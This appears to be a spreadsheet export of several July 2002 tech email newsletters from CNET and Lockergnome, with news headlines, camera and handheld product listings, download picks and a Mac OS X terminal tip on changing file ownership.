\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n| **NEW!** CNET professional e-mail publishing for just $24.95/month. **FREE\nfor 30 days. Click here!**  \n---  \n  \n![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.  \n![]([URL]http://www.zdnet.com[/URL] ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]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26&amp;ISSUE=2002-07-10)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.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cnet-newsletters@example.com\nFrom: "CNET News.com Daily Dispatch" &lt;Online#3.19687.75-gWr1gbt2IZA1r9RR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 13:52:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 13:52:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Daily Dispatch" &lt;Online#3.19687.75-gWr1gbt2IZA1r9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.COM: The tech side of homeland defense</t>
  </si>
  <si>
    <t>![]([URL]http://home.cnet.com[/URL]  \n|\n\n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![In the News]([URL]http://home.cnet.com[/URL]  \n| July 10, 2002  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] The tech side of homeland defense  \n![]([URL]http://home.cnet.com[/URL] Studios sue defunct $1 movie site  \n![]([URL]http://home.cnet.com[/URL] $215 million later, start-up\nPluris shuts down  \n![]([URL]http://home.cnet.com[/URL] Apple to expand iMac LCD display  \n![]([URL]http://home.cnet.com[/URL] NextCard cuts off credit card\ncustomers  \n![]([URL]http://home.cnet.com[/URL] Tapping China's brainpower  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |   **Vision Series**  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n  \nRead News.com's exclusive interviews of 10 top CIOs.  \n**Vision Series home**  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**The tech side of homeland defense**  \nComputer security is becoming an increasingly critical part of President\nBush's proposal for a Department of Homeland Security, as politicians fret\nabout tech-savvy terrorists--and insist that any new agency must shield the\nUnited States from electronic attacks. Meanwhile, the administration says that\nit's open to the idea of a chief privacy officer for the agency.  \nJuly 10, 2002, 9:45 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Studios sue defunct $1 movie site**  \nThe movie studio's trade association filed suit Tuesday against Film88.com, a\nwould-be Internet video Web site that has allegedly popped up in several\nincarnations around the world. Calling the site a "piratical, virtual 'video-\non-demand' business," the Motion Picture Association of America (MPAA) and its\nmember studios sued the company and an individual allegedly associated with it\nin a California federal court.  \nJuly 10, 2002, 12:00 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**$215 million later, start-up Pluris shuts down**  \nNetworking start-up Pluris will release a statement Wednesday announcing it\nhas closed its doors due to a lack of funding and ongoing woes in the market\nit serves, according to a spokeswoman familiar with the company's plans.\nPluris, a once promising company, burned through $215 million over the past\nfew years as it attempted to build a high-end router that was intended to\noutclass similar products from competitors such as Juniper Networks and Cisco\nSystems.  \nJuly 10, 2002, 12:30 PM PT |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n  \n**Apple to expand iMac LCD display**  \nApple Computer plans to serve up a new iMac model with a larger flat-panel\ndisplay during next week's Macworld Expo trade show, according to sources. The\nupgrade to a 17-inch liquid crystal display (LCD) comes as sales have all but\nstalled on existing 15-inch flat-panel iMacs. Apple unveiled the original\nflat-panel iMac, which suspends the monitor from a pivoting arm attached to a\nhemispherical base, during January's Macworld Expo in San Francisco.  \nJuly 9, 2002, 3:50 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**NextCard cuts off credit card customers**  \nFederal regulators on Wednesday deactivated hundreds of thousands of credit\ncards belonging to former customers of NextCard. The Federal Deposit Insurance\nCorporation (FDIC), which had been trying unsuccessfully to sell the 800,000\naccounts since taking them over in February, shut them down after they failed\ncertain performance measures over the past three months, said David Barr, an\nFDIC spokesman. Although NextCard customers will no longer be able to use\ntheir cards to make purchase or cash withdrawals, they will continue to be\nresponsible for their outstanding balances.  \nJuly 10, 2002, 12:25 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Tapping China's brainpower**  \nThe country's engineers are ambitious--and finding open arms at U.S.\ncompanies.  \nJuly 10, 2002, 4:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n|  **From our partners:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n**The WorldCom hearing's target: voters**  \nBusiness Week  \nNovember-nervous lawmakers hogged the stage in a show of outrage and concern,\nwhile fact-finding barely made a cameo.  \nJuly 10, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Can Bush walk his talk?**  \nBusiness Week  \nHe said much that was right in his Wall Street speech. But doubts swirl about\nhis follow-through--and his own business dealings.  \nJuly 10, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Also from CNET:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |  ![Crucial\n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n  \n![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://news.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n|  **Tech hurdles ahead for e911**  \nCorrespondent Melissa Francis looks at the technology hurdles facing wireless\ncarriers in launching the second phase of the e911 initiative by October.  \n![]([URL]http://news.cnet.com[/URL] **Watch Video**  \n  \n---|---|---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n**Enterprise**  \n\n  * India's Infosys tops forecast but is wary\n  * Liberty Alliance to unveil software spec\n  * FBI picks new CIO \n|\n\n**E-Business**  \n\n  * Stocks slump on accounting jitters\n  * eBay glitch charges sellers double\n  * Bush speech leaves Wall Street doubting \n  \n---|---  \n  \n**Communications**  \n\n  * WorldCom scrutiny goes federal\n  * Comcast shareholders bless AT&amp;T; deal\n  * U.S. Attorney investigates Qwest \n|\n\n**Media**  \n\n  * Banks bail out Vivendi with loans\n  * Bush security plan may get privacy nod\n  * Gnutella pioneer Gene Kan dies \n  \n  \n**Personal Technology**  \n\n  * Verizon dials in for downtown details\n  * Taiwan's Acer sees lax tech rebound\n  * Chipmaker packs Wi-Fi into handhelds \n|  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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n\nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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33&amp;ISSUE=2002-07-10)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>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a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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news.cnet.com http://home.cnet.com http://news.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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cnet-newsletters@example.com\nFrom: CNET Shopper Electronics Edition &lt;Online#3.19685.54-2t7_gc22RoTI4sRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 13:17:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 13:17:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Shopper Electronics Edition &lt;Online#3.19685.54-2t7_gc22RoTI4sRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Looking for the perfect camera for your summer vacation? (CNET SHOPPER)</t>
  </si>
  <si>
    <t>\n\n![CNET Shopper Electronics\nNewsletter]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n  \n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nShopper All CNET The Web  \n---  \n  \n![Most Popular]([URL]http://home.cnet.com[/URL]  \n1 | Sony Cyber Shot DSC-F707  \n  \n---|---  \n2 | Canon PowerShot S40  \n  \n3 | Palm m515  \n  \n4 | Palm i705  \n  \n5 | Nikon Coolpix 995  \n  \n![ ]([URL]http://www.cnet.com[/URL]  **All most popular**  \n---  \n  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft  **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  |  |  | ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://computers.cnet.com[/URL] |  **Canon\nPowerShot S330 Elph**  \nÂ• 2,000,000 pixels  \nÂ• 2.5 x digital zoom  \nÂ• 3 x optical zoom  \nÂ• Built-in flash  \nÂ• **Just $338**  \n![](/b.gif)  \n![]([URL]http://shopper.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Accessorize your camera:**  \nCanon CB-2LS Battery Charger |  Canon ACK-500 Power Adapter Kit  \nCanon 48 MB CompactFlash Card |  Canon 64 MB CompactFlash Card  \n![]([URL]http://www.cnet.com[/URL]  \n  \n\n![Featured]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://shopper.cnet.com[/URL] |  **Fujifilm\nFinePix 30i**  \nÂ• 1,920,000 pixels  \nÂ• 5.3 oz  \nÂ• Built-in flash  \n   **Lowest Price: $245**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Minolta Dimage\nX**  \nÂ• Free shipping available  \nÂ• 2.1-megapixels, 1.5-in LCD  \nÂ• 3 x optical zoom, 2 x digital  \n   **Starting at: $282**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Olympus\nCamedia D-40 Zoom**  \nÂ• 4.0-megapixel, 1.8-in LCD monitor  \nÂ• 2.8x optical/2.5x digital zoom  \nÂ• Incl. 16MB SmartMedia card  \n   **Lowest Price: $447**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Canon\nPowerShot A40**  \nÂ• 2-megapixels, new shooting modes  \nÂ• 2.5x optical/3x digital zoom  \nÂ• Professional-level features  \n   **Lowest Price: $268**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Casio GV-10**  \nÂ• 1,200,000 pixels  \nÂ• Built-in flash  \nÂ• 1.6 in LCD display  \n   **Lowest Price: $310**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Kyocera\nFinecam S4**  \nÂ• 3,870,000 pixels  \nÂ• 2.5 x digital zoom  \nÂ• 3 x optical zoom  \n   **Lowest Price: $524**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n![Special Feature]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \nDid you know that ChannelOnline enables you to streamline your sales process\nby building quotes and orders online?\n\nSimply select a customer you've previously entered into ChannelOnline's\ndatabase and their company information, and a customized price profile is\nautomatically applied to their quote. You can add products as you search the\nproduct database and work on multiple quotes at once as you respond to\ndifferent customer requests throughout the day.\n\n**Sign up now** to streamline your entire buying and selling chain.\n\n**Tell me more about ChannelOnline.**\n\n![On the CNET Network]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**\n\n  * Tech Trends\n  * Hardware\n  * Software\n  * Shopping\n  * Downloads \n** |  **\n\n  * News\n  * Investing\n  * Electronics\n  * Web Building\n  * Help &amp; How-Tos \n** |  **\n\n  * Internet\n  * Games\n  * Message Boards\n  * CNET TV &amp; Radio\n  * Music Center\n\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40&amp;ISSUE=2002-07-10)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.techrepublic.com http://a.r.tv.com http://cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://computers.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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cnet-newsletters@example.com\nFrom: CNET Handhelds Newsletter &lt;Online#3.19676.e7-ldDFl1QrfB8URRRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 11:51:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 11:51:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Handhelds Newsletter &lt;Online#3.19676.e7-ldDFl1QrfB8URRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Xscale disappoints in Toshiba's e740</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n![Handhelds Newsletter]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n![]([URL]http://a.r.tv.com[/URL] | ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![advertisement]([URL]http://www.cnet.com[/URL]  \n---  \n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![](http://cnet.com[URL]http://a.r.tv.com[/URL]  \n  \nDownloads All CNET The Web  \n---  \n  \n![Shopper Top 10]([URL]http://a.r.tv.com[/URL]  \n**Top-selling handhelds:**  \n\n  1. Toshiba Pocket PC e310\n  2. Palm m515\n  3. Handspring Treo 90\n  4. Compaq iPaq H3835\n  5. Palm Vx\n  6. Handspring Treo 270\n  7. Sony CLIE PEG-NR70V\n  8. Sony CLIE PEG-T615C\n  9. Palm m130\n  10. Toshiba Pocket PC e740 \nFind the latest prices for these and other handhelds on **CNET Shopper.com**.  \n---  \n  \n![Add-on Spotlight]([URL]http://a.r.tv.com[/URL]  \n  \n---  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n\n**Handspring Eyemodule2**  \nThough it's a little expensive, the Eyemodule2 is a well-designed camera\nattachment that offers acceptable image quality\n\nCheck latest prices  \n  \n![Latest Handhelds News]([URL]http://a.r.tv.com[/URL]  \n**Start-up nears launch for Hiptop handheld  \n**  \n**Start-up shrinks PC to palm size  \n---  \n  \n![More Handhelds Coverage]([URL]http://a.r.tv.com[/URL]  \n**Most popular Palm downloads  \n![]([URL]http://a.r.tv.com[/URL]  \nMost popular Pocket PC downloads  \n![]([URL]http://a.r.tv.com[/URL]  \nTop 5 handhelds  \n![]([URL]http://a.r.tv.com[/URL]  \nEditors' Choice handhelds  \n![]([URL]http://a.r.tv.com[/URL]  \nNews  \n![]([URL]http://a.r.tv.com[/URL]  \nProduct reviews  \n![]([URL]http://a.r.tv.com[/URL]  \nWireless handhelds  \n![]([URL]http://a.r.tv.com[/URL]  \nSoftware  \n![]([URL]http://a.r.tv.com[/URL]  \nDownloads  \n**  \n  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n![]([URL]http://a.r.tv.com[/URL] | ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://a.r.tv.com[/URL] |  | ![]([URL]http://a.r.tv.com[/URL]\n|  \nJuly 9, 2002  \n![]([URL]http://a.r.tv.com[/URL]  \n  \n---|---  \nWhen reviewing the Toshiba Pocket PC e740, I spent a lot of time trying to\nunderstand its XScale processor. A benchmark provided by Intel seems to\nindicate that it performs certain operations faster than previous Pocket PCs,\nbut in hands-on use we didn't find any significant difference in performance.\nI'm still not certain whether I should attribute performance limitation to the\noperating system (which hasn't been optimized for the new chips), applications\n(which likewise haven't be optimized), or simply that the new chip isn't that\nmuch better than the old StrongARM. But regardless, the e740 is an exceptional\nPocket PC and one I don't hesitate to recommend to those looking for a high-\npowered PDA.  \n  \nColin Duwe  \nAssociate Editor  \nCNET Electronics  | ![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n---  \n![CNET's Exclusive Downloads]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n---  \n**In Palm OS:**  \n|   |  **Most Popular Titles**  \nWeek ending June 11  \n---|---  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n1 | **Noah Lite English dictionary  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n2 | **DopeWars (Palm) **  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n3 | **Blocks **  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n4 | **Palm Desktop**  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n5 | **Sketcher**  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n  \n  \n**All popular Palm OS downloads**\n\n**In Pocket PC:**  \n|   |  **Most Popular Titles**  \nWeek ending June 11  \n---|---  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n1 | **SimCity2000**  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n2 | **TV Remote Controller**  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n3 | **GigaBar**  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n4 | **ActiveSync **  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n5 | **Syntact Gamebox (Pocket PC)**  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n  \n  \n**All popular PocketPC downloads**  \n  \n  \n![Reviews and Features]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL]  \n---  \n**Must-have Palm OS games: Newly updated**  \nWe've listened to reader suggestions, tested the latest games to be released,\nand now we're ready to present our current list of favorite games for your\nPalm.  \nRead the full story  \n\n**Toshiba Pocket PC e740**  \nPowered by Intel's new 400MHz XScale processor and boasting integrated Wi-Fi\nconnectivity, Toshiba's new PDA is an impressive mobile machine. We got hands\non with it to test the new chips and its myriad features. See how it did.  \nRead the review  |  Check latest price  \n  \n\n**More handhelds reviews &amp; features  \n![Picks of the Week]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n  \n---  \n|  **Uninstall Hack 1.59**  \nFile size: 36.6K  \nLicense: Free to try; $7.00 to buy  \nUninstall Hack is designed to help keep your Palm device running smoothly by\nmonitoring application installations and removing all traces of an application\nduring the uninstall process. Uninstall Hack also removes leftover files from\napplications removed using the standard Palm OS delete tool, leaving your Palm\ndevice clean and trouble-free.  \n  \n**Quik Budget 3.2**  \n  \n**All Palm OS editors' picks**  \n---  \n![Picks of the Week]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n---  \n|  **PictPocket 2.0**  \nFile size: 1.09MB  \nLicense: Free to try; $16.95 to buy  \nTake your pictures with you on your Pocket PC. PictPocket allows you to view\nand edit several types of digital image files including MPEG-1 and MPEG-2\nvideo, BMP, 2BP, JPG, JPE, JPEG, GIF, and many more, making this a truly\nmobile multimedia solution.  \n  \n**All Windows CE/PocketPC editors' picks**\n\n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] | **\n\n  * Live Tech Help. Submit your question now.\n  * CNET News.com: Top CIOs on the future of IT.\n  * Find a job you love. Over 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV \n**  \n---  \n  \n![]([URL]http://a.r.tv.com[/URL]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24&amp;ISSUE=2002-07-10)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://www.cnet.com http://www.cnet.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a.r.tv.com http://home.cnet.com http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://a.r.tv.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lg@example.com\nFrom: Lockergnome Apple Core &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 10 Jul 2002 10:57:10 -0500</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 10:57:10 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Apple Core]  Skip Content</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![See You\nat Gnomedex\n2002!]([URL]http://www.lockergnome.com[/URL]  \n  \n---  \n|\n\n  07.09.2002 GnomeREPORT  \n  \n---  \n  \n**Content Management Is Key:** Need a reason your boss should be sending you\nto Gnomedex? Some of the leading experts on content management solutions\n(those things we affectionately call blogs) will be sharing the future of\nblogging and how you can adapt it to both the way you do business and the way\nyou communicate in general. Join Evan Williams and Doc Searls as they share\npearls of wisdom on blogging, Linux and other open source applications that\nare changing our lives. If that's not enough incentive, remind the boss that\nTHE Internet security guru, Steve Gibson, will be sharing his wisdom as well.\nRegister for Gnomedex today!  \n---  \n  \nI've finally done it! Lockrgnome's Top 50 Mac OS X Tips is in publication and\navailable for purchase at GnomeTomes.com. Less than half the tips have\nappeared in the Apple Core newsletter already, so purchasing them means\ngetting mostly brand new content. This represents the first thing I've written\nthat people might actually pay to read, so if we sell one copy, I'll be\necstatic. And hopefully, any of you who check out the tips will find them\nuseful. I know that figuring out how to do each of the 50 things on the list\nhas improved my personal OS X experience.\n\nAlthough this newsletter started out with Chris, Randy, and I writing sections\nof the newsletter, time constraints have limited the contributions of the\nother two guys. This does not mean either of them is truly less involved, it\njust means I'm doing more writing. Both Chris and Randy regularly send me\nlinks to cool Mac stuff they find, much of which will ultimately end up in\nupcoming issues. Since the writing will be primarily mine, I've opted to\neliminate the "Review by" links at the bottom of each article. Unless\notherwise noted, you can safely assume I wrote it. If you need to send me an\ne-mail, the E-mail The Editors Link in the sidebar will reach me, as well as\nputting your message in front of Chris and Randy.\n\nI've been doing some exploring of AppleScript over the past several months and\nbelieve I'm finally confidant enough in writing scripts that I'm going to add\na section on scripting to the newsletter. I'm curious to know what your level\nof experience with scripting is, because I can either start with some really\nbasic stuff, or skip the basics and dive into meatier scripting topics. Either\nway, I'm open to some AppleScript suggestions.\n\nSee You in August,  \nJake Ludington  \n\nFor Mac Outlook users:  \nOS X Tips - [URL]http://www.gnometomes.com[/URL]\n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n**Sherlock Plugins v2.2 [600k] Mac OS 9/OSX FREE**\n\n[URL]http://www.searchstandard.com[/URL]\n\nWhile doing some research for my top 50 tips, I discovered that turning off\nsome of Sherlock's extras, like multi-language indexing, in the preferences\nwill speed things up considerably, particularly for local machine searches.\nThis renewed my interest in finding ways to add-on search capabilities to the\nbundled sleuth, resulting in my discovery of SearchStandard.com. This bundled\ncollection of search plug-ins makes it possible to look for almost anything\nusing Sherlock. Their Web site won't wow you, but SearchStandard's free\nplugins most certainly make finding things online, including searches on your\nfavorite Mac sites, that much easier.\n\n  \n\n GnomeNETWORK  \n  \n---  \n  \n**Xnet v1.0.6 [216k] OSX $48**\n\n[URL]http://bitcom.ch[/URL]\n\nDealing with servers that offer mission critical services, like intranet\naccess, e-mail, or Web serving, means dealing with those services failing from\ntime to time. Don't be left in the dark when one of your services go down, let\nXnet keep you informed. The unregistered version of the product lets you\nverify http, ping, smtp, and ftp service availability, with many more service\nverifications included in the pro version. Xnet runs on your local machine,\nverifying remote service availability and sending you a message when those\nservices go down. The interface allows for user-defined services, with alert\nfeatures for both an e-mail account (mine alerts are going to my cell phone)\nand locally via a sound from your machine.\n\n  \n\n GnomeTERMINAL  \n  \n---  \n  \nFor OS X installs with multiple users, there may come a time when you need to\nchange ownership of a particular file. This is particularly useful in\nsituations where one user created a file, but an entirely different user is\nthe only one who will ever make future decisions relating to that file, like\nwhether to keep it or throw it in the Trash. chown is the Terminal command\ndesigned to handle this. From the command line type:\n\nsudo chown username filename\n\nYou'll of course want to substitute the username of the new owner for\nusername. The name of the file receiving a change of ownership will replace\nfilename.\n\n**50 LINUX TIPS:** From the mind behind the Penguin Shell come two more eBooks\nin the GnomeTome series. Whether you are a Linux newbie or command line guru,\nyou'll want these tips as part of your information arsenal. Get your copy of\nTony's Top 50 PenguinTWEAKS or Top 50 PenguinCORE tips today!  \n---  \n  \n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**Susan Kare**\n\n[URL]http://www.kare.com[/URL]\n\nAs we move further into the future of Apple's Mac OS evolution, it remains\nimportant to understand where things evolved from. Susan Kare designed all the\noriginal icons for the Mac OS, way back in 1983\. In fact, that smiling Mac\nthat appears as OS X boots is her creation. Check out her collection of UI\nartwork, from both Windows and Mac operating systems. Also available from\nKare.com are Kare designed icon apparel and collections of fonts as 